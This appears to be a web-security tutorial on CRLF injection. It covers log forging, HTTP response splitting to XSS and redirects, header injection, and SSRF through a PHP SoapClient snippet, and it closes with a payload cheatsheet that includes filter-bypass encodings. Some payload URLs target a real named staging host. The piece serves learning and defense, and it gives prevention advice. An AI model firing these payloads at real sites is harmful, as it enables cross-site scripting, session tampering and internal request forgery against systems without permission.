What is CRLF?
When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content, i.e. the response body. The HTTP headers and the HTML response (the website content) are separated by a specific combination of special characters, namely a carriage return and a line feed. For short they are also known as CRLF.
The web server uses the CRLF to understand when new HTTP header
begins and another one ends. The CRLF can also tell a web application or
user that a new line begins in a file or in a text block. The CRLF
characters are a standard HTTP/1.1 message, so it is used by any type of
web server, including Apache, Microsoft IIS and all others.
What is the CRLF Injection Vulnerability?
In a CRLF injection vulnerability attack the attacker inserts both the carriage return and linefeed characters into user input to trick the server, the web application or the user into thinking that an object is terminated and another one has started. As such the CRLF sequences are not malicious characters, however they can be used for malicious intend, for HTTP response splitting etc.
CRLF injection in web applications
In web applications a CRLF injection can have severe impacts, depending on what the application does with single items. Impacts can range from information disclosure to code execution, a direct impact web application security vulnerability. In fact a CRLF injection attack can have very serious repercussions on a web application, even though it was never listed in the OWASP Top 10 list. For example it is also possible to manipulate log files in an admin panel as explained in the below example.
An example of CRLF Injection in a log file
Imagine a log file in an admin panel with the output stream pattern of IP – Time – Visited Path, such as the below:
123.123.123.123 - 08:15 - /index.php?page=home
If an attacker is able to inject the CRLF characters into the HTTP request he is able to change the output stream and fake the log entries. He can change the response from the webs application to something like the below:
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
The %0d and %0a are the url encoded forms of CR and LF. Therefore the log entries would look like this after the attacker inserted those characters and the application displays it:
IP – Time – Visited Path
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
Therefore by exploiting a CRLF injection vulnerability the attacker can fake entries in the log file to obfuscate his own malicious actions. The attacker is literally doing page hijacking and modifying the response. For example imagine a scenario where the attacker has the admin password and executed the restrictedaction parameter, which can only be used by an admin.
The problem is that if the administrator notices that an unknown IP used the restrictedaction parameter, will notice that something is wrong. However, since now it looks like the command was issued by the localhost (and therefore probably by someone who has access to the server, like an admin) it does not look suspicious.
The whole part of the query beginning with %0d%0a will be handled
by the server as one parameter. After that there is another & with
the parameter restrictedactionwhich will be parsed by the server as
another parameter. Effectively this would be the same query as:
/index.php?page=home&restrictedaction=edit
HTTP Response Splitting Using CRLF Injection
Since the header of a HTTP response and its body are separated by CRLF characters an attacker can try to inject those. A combination of CRLFCRLF will tell the browser that the header ends and the body begins. That means that he is now able to write data inside the response body where the html code is stored. This can lead to a Cross-site Scripting vulnerability.
An example of HTTP Response Splitting leading to XSS
Imagine an application that sets a custom header, for example:
X-Your-Name: Bob
The value of the header is set via a get parameter called “name”. If no URL encoding is in place and the value is directly reflected inside the header it might be possible for an attacker to insert the above mentioned combination of CRLFCRLF to tell the browser that the request body begins. That way he is able to insert data such as XSS payload, for example:
?name=Bob%0d%0a%0d%0a<script>alert(document.domain)</script>
The above will display an alert window in the context of the attacked domain.
An example of HTTP Response Splitting leading to Redirect
Browser to:
/%0d%0aLocation:%20http://myweb.com
And the server responses with the header:
Location: http://myweb.com
crlf injection In URL Path
You can send the payload inside the URL path to control the response from the server:
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
HTTP Header Injection Using CRLF Injection
By exploiting a CRLF injection an attacker can also insert HTTP headers which could be used to defeat security mechanisms such as a browser’s XSS filter or the same-origin-policy. This allows the attacker to gain sensitive information like CSRF tokens. He can also set cookies which could be exploited by logging the victim in the attacker’s account or by exploiting otherwise unexploitable cross-site scripting (XSS) vulnerabilities.
An example of HTTP Header Injection to extract sensitive data
If an attacker is able to inject the HTTP headers that activate CORS (Cross Origin Resource Sharing), he can use javascript to access resources that are otherwise protected by SOP (Same Origin Policy) which prevents sites from different origins to access each other.
New HTTP request in SSRF
Abusing CRLF injection you can craft a new HTTP request and inject it.
A
good example can be done using the SoapClient deserialization gadget
from in PHP. This class is vulnerable to CRLF inside the user_agent
parameter allowing to insert new headers and body content. However, you
can even be able to abuse this vulnerability to inject a new HTTP
request:
$target = 'http://127.0.0.1:9090/test';
$post_string = 'variable=post value';
$crlf = array(
'POST /proxy HTTP/1.1',
'Host: local.host.htb',
'Cookie: PHPSESSID=[PHPSESSID]',
'Content-Type: application/x-www-form-urlencoded',
'Content-Length: '.(string)strlen($post_string),
"\r\n",
$post_string
);
$client = new SoapClient(null,
array(
'uri'=>$target,
'location'=>$target,
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
)
);
#Put a nc listening in port 9090
$client->__soapCall("test", []);
Impacts of the CRLF injection Vulnerability
The impact of CRLF injections vary and also include all the impacts of Cross-site Scripting to information disclosure. It can also deactivate certain security restrictions like XSS Filters and the Same Origin Policy in the victim’s browsers, leaving them susceptible to malicious attacks.
How to Prevent CRLF / HTTP Header Injections in Web Applications
The best prevention technique is to not use users input directly inside response headers. If that is not possible, you should always use a function to encode the CRLF special characters. Another good web application security best practise is to update your programming language to a version that does not allow CR and LF to be injected inside functions that set HTTP headers.
CHEATSHEET OF CRLF INJECTION ATTACK
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test